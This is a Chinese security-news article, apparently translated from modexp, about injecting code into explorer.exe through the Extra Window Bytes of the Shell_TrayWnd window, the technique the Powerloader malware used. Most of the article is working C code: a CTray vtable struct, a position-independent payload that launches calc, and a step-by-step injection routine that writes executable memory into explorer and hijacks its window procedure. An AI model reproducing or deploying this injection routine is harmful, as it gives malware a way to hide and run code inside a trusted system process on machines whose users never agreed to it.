Windows进程注入技术:额外窗口字节能做很多事情

2018-09-16 194220人围观 ,发现 1 个不明物体 系统安全

Windows进程注入技术

介绍

Windows 进程注入技术之所以被众人所知,是因为2013年肆虐网络的Powerloader恶意软件当时使用的正是这种技术。在此之前,几乎没有人知道这种进程注入技术,因为从上世纪80年代到90年代初期,当时的Windows操作系统就已经引入了这种“功能”。额外窗口字节的索引0值可以用来跟一个窗口的类对象进行关联,指向类对象的指针是使用SetWindowLongPtr存储在索引0位置的,并通过GetWindowLongPtr来获取。

早在2009年的WASM论坛上,就曾有一位名叫“Indy(Clerk)”的用户提到过将“Shell_TrayWnd”类作为一种注入向量来使用。下图显示的就是“Shell_TrayWnd”类的相关信息,你可以看到窗口字节的索引0设置有相应的值:

Windows进程注入技术

WindowsSpy++在这里并不能显示完整的64位值,但是在下图中我们可以看到,它显示了GetWindowLongPtr API所返回的同一窗口的值(CTray对象的完整地址):

Windows进程注入技术

CTray类

这个类中只有三个方法,而且没有额外的属性值。指向每一个方法的指针都只有只读属性,所以我们不能直接将指向WndProc的指针重写并让它指向我们的Payload。因此,我们需要手动构造一个对象,但是我认为另一种比较好的方法是将现有对象拷贝到本地内存之中,重写WndProc,然后把对象写到explorer内存中的一个新的位置。下面的结构体可以用来定义我们所需要的对象及指针:

//CTray object for Shell_TrayWnd
type defstruct _ctray_vtable {
    ULONG_PTR vTable;    // change to remote memory address
    ULONG_PTR AddRef;
    ULONG_PTR Release;
    ULONG_PTR WndProc;   // window procedure (change to payload)
}CTray;

上面这个结构体包含了替换CTray对象(包括32位和64位操作系统)所需要的所有数据,32位系统中ULONG_PTR的大小为4个字节,64位系统则是8个字节。

Payload

这种方法跟PROPagate所使用的代码之间主要的区别就在于函数原型,如果在函数将返回值传递给调用者时我们不提供相同数量的参数,那么将有可能让Windows Explorer崩溃,或者让那些跟这个类有关联的窗口发生崩溃。

LRESULTCALLBACK WndProc(HWND hWnd, UINT uMsg,
  WPARAM wParam, LPARAM lParam)
{
    // ignore messages other than WM_CLOSE
    if (uMsg != WM_CLOSE) return 0;
   
    WinExec_t pWinExec;
    DWORD    szWinExec[2],
              szCalc[2];
 
    // WinExec
    szWinExec[0]=0x456E6957;
    szWinExec[1]=0x00636578;
 
    // calc
    szCalc[0] = 0x636C6163;
    szCalc[1] = 0;
 
    pWinExec =(WinExec_t)xGetProcAddress(szWinExec);
    if(pWinExec != NULL) {
      pWinExec((LPSTR)szCalc, SW_SHOW);
    }
    return 0;
}

完整的函数

下面给出的是执行注入所需要的完整函数代码(位置无关代码PIC),这里为了方便演示,我忽略了错误处理:

LPVOIDewm(LPVOID payload, DWORD payloadSize){
    LPVOID   cs, ds;
    CTray    ct;
    ULONG_PTR ctp;
    HWND     hw;
    HANDLE   hp;
    DWORD    pid;
    SIZE_T   wr;

1. 获取shell tray窗口的处理器

    hw = FindWindow("Shell_TrayWnd",NULL);

 2. 获取explorer.exe的进程ID

    GetWindowThreadProcessId(hw, &pid);

 3. 打开explorer.exe

    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE,pid);

  4. 获取指向当前CTray对象的指针

    ctp = GetWindowLongPtr(hw, 0);

  5. 读取当前CTray对象的地址

  ReadProcessMemory(hp, (LPVOID)ctp,

        (LPVOID)&ct.vTable,sizeof(ULONG_PTR), &wr);

6. 从虚拟页表中读取三条地址

ReadProcessMemory(hp, (LPVOID)ct.vTable,

      (LPVOID)&ct.AddRef, sizeof(ULONG_PTR)* 3, &wr);

7.为代码分配内存读/写/执行权限

  cs = VirtualAllocEx(hp, NULL, payloadSize,

      MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);

8. 将代码拷贝到目标进程中

    WriteProcessMemory(hp, cs, payload,payloadSize, &wr);

9. 为新的CTray对象分配内存读/写权限

ds = VirtualAllocEx(hp, NULL, sizeof(ct),

      MEM_COMMIT | MEM_RESERVE,PAGE_READWRITE);

10. 向远程内存写入新的CTray对象

ct.vTable = (ULONG_PTR)ds + sizeof(ULONG_PTR);

    ct.WndProc = (ULONG_PTR)cs;

    WriteProcessMemory(hp, ds, &ct,sizeof(ct), &wr);

11. 设置指向CTray对象的新指针

    SetWindowLongPtr(hw, 0, (ULONG_PTR)ds);

12. 通过窗口消息触发Payload

    PostMessage(hw, WM_CLOSE, 0, 0);

13. 恢复原始的CTray对象

    SetWindowLongPtr(hw, 0, ctp);

14. 释放内存,关闭处理进程

   VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT |MEM_RELEASE);

    VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT |MEM_RELEASE);

 

    CloseHandle(hp);

}

总结

这种针对窗口对象的进程注入技术通常会被归类为“Shatter”攻击,虽然Windows Vista引入的用户接口权限隔离(UIPI)功能从某种程度上来说能够缓解这种攻击所带来的影响,但最新版本的Windows 10操作系统仍然无法抵御这种类型的攻击。

感兴趣的用户可以点击【这里】获取Payload源代码和可执行程序计算器。

* 参考来源:modexp,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

相关推荐
发表评论

已有 1 条评论

取消
Loading...

特别推荐

推荐关注

官方公众号

聚焦企业安全

填写个人信息

姓名
电话
邮箱
公司
行业
职位
css.php